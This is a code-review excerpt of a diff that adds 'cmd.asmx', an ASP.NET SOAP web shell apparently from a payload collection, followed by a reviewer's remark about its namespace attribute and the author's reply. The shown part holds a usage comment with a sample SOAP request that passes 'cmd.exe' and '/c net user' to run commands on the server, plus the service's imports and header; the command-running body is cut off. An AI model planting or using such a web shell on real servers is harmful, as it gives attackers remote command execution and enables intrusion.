aspx/cmd.asmx

```diff
@@ -0,0 +1,84 @@
+<%--
+Usage:
+POST /test.asmx/Test HTTP/1.1
+Host: example.com
+Content-Type: text/xml; charset=utf-8
+Content-Length: 363
+SOAPAction: "http://tempuri.org/Test"
+<?xml version="1.0" encoding="utf-8"?>
+<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
+  <soap:Body>
+    <Test xmlns="http://tempuri.org/">
+      <Z1>cmd.exe</Z1>
+      <Z2>/c net user</Z2>
+    </Test>
+  </soap:Body>
+</soap:Envelope>
+--%>
+
+<%@ WebService Language="C#" Class="Service" %>
+using System;
+using System.Web;
+using System.IO;
+using System.Net;
+using System.Text;
+using System.Data;
+using System.Data.SqlClient;
+using System.Collections.Generic;
+using System.Diagnostics;
+using System.Web.SessionState;
+using System.Web.Services;
+using System.Xml;
+using System.Web.Services.Protocols;
+
+[WebService(Namespace = "http://www.payloads.online/")]
```

Comment:
If it's useless remove it, else set a placeholder.

https://docs.microsoft.com/en-us/dotnet/api/system.web.services.webserviceattribute.namespace?view=netframework-4.8

Reply:
I'll set a default value.